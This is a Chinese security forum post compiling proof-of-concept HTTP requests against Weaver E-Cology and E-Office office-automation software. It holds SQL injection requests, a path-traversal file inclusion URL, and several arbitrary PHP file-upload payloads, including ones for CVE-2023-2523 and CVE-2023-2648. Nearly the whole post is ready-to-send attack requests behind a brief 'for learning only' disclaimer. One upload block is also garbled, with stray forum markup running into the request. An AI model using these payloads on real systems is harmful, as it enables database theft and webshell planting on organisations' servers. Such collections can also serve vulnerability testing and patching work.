请选择 进入手机版 | 继续访问电脑版

DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 1568|回复: 1

[2023HW] 泛微漏洞 PoC 整理

[复制链接]

169

主题

20

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
332
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2023-8-16 22:08:40 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

泛微 E-Cology 某版本 SQL 注入漏洞


  1. POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
  2. Host: xxx.xxx.xxx.xxx:port
  3. User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
  4. Connection: close
  5. Content-Length: 189
  6. Content-Type: text/plain
  7. Accept-Encoding: gzip

  8. callCount=1
  9. page=
  10. httpSessionId=
  11. scriptSessionId=
  12. c0-scriptName=DocDwrUtil
  13. c0-methodName=ifNewsCheckOutByCurrentUser
  14. c0-id=0
  15. c0-param0=string:1 AND 1=1
  16. c0-param1=string:1
  17. batchId=0
复制代码

泛微 HrmCareerApplyPerView SQL 注入漏洞


  1. GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1
  2. Host: 127.0.0.1:7443
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
  4. Accept-Encoding: gzip, deflate
  5. Connection: close
复制代码

泛微 ShowDocsImage SQL 注入漏洞


  1. GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1
  2. Host: 127.0.0.1
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
  4. like Gecko)
  5. Accept-Encoding: gzip, deflate
  6. Connection: close
复制代码

泛微 Weaver E-Office9 前台文件包含


  1. http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls
复制代码

泛微 E-Office uploadify.php 后台文件上传漏洞


上传文件所在路径:/attachment/3466744850/xxx.php

  1. POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
  4. Connection: close
  5. Content-Length: 259
  6. Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
  7. Accept-Encoding: gzip

  8. --e64bdf16c554bbc109cecef6451c26a4
  9. Content-Disposition: form-data; name="Filedata"; filename="2TrZmO0y0SU34qUcUGHA8EXiDgN.php"
  10. Content-Type: image/jpeg

  11. <?php echo "2TrZmO0y0SU34qUcUGHA8EXiDgN";unlink(__FILE__);?>

  12. --e64bdf16c554bbc109cecef6451c26a4--
复制代码

泛微 E-Office9 文件上传漏洞 CVE-2023-2523


  1. POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
  2. Host:xxx.xxx.xxx.xxx:port
  3. Cache-Control:max-age=0  
  4. Upgrade-Insecure-Requests:1  
  5. Origin:null  
  6. Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt  
  7. Accept-Encoding:gzip, deflate
  8. Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
  9. Connection:close

  10. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
  11. Content-Disposition:form-data; name="upload_quwan"; filename="1.php."
  12. Content-Type:image/jpeg
  13. <?phpphpinfo();?>
  14. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
复制代码

泛微 E-Office9 文件上传漏洞 CVE-2023-2648


  1. POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
  2. Host: 192.168.233.10:8082
  3. User-Agent: test
  4. Connection: close
  5. Content-Length: 493
  6. Accept-Encoding: gzip
  7. Content-Type: multipart/form-data

  8. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
  9. Content-Disposition: form-data; name="Filedata"; filename="666.php"
  10. Content-Type: application/octetstream

  11. <?php phpinfo();?>
  12. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt[/h2]
  13. [h2]泛微 Weaver E-Office9.0 文件上传[/h2]
  14. [code]POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
  15. Host: xxx.xxx.xxx.xxx:port
  16. User-Agent: test
  17. Connection: close
  18. Content-Length: 493
  19. Accept-Encoding: gzip
  20. Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85

  21. --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
  22. Content-Disposition: form-data; name="Filedata"; filename="666.php"
  23. Content-Type: application/octet-stream

  24. <?php phpinfo();?>

  25. --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
  26. --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
  27. Content-Disposition: form-data; name="file"; filename=""
  28. Content-Type: application/octet-stream

  29. --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--

  30. POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
  31. Host: xxx.xxx.xxx.xxx:port
  32. User-Agent: test
  33. Connection: close
  34. Content-Length: 493
  35. Accept-Encoding: gzip
  36. Content-Type: multipart/form-data

  37. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
  38. Content-Disposition: form-data; name="Filedata"; filename="666.php"
  39. Content-Type: application/octet-stream

  40. <?php phpinfo();?>

  41. ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
复制代码

0

主题

11

回帖

0

荣誉

Rank: 1

UID
1429
积分
2
精华
0
沃币
9 枚
注册时间
2023-8-10
发表于 2023-9-4 13:43:21 | 显示全部楼层
这次漏洞有点多奥
产权交易 https://www.ejy365.com
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1楼
2楼

Archiver|小黑屋|DecoyMini 技术交流社区 ( 京ICP备2021005070号 )

GMT+8, 2024-2-23 12:39 , Processed in 0.059395 second(s), 26 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表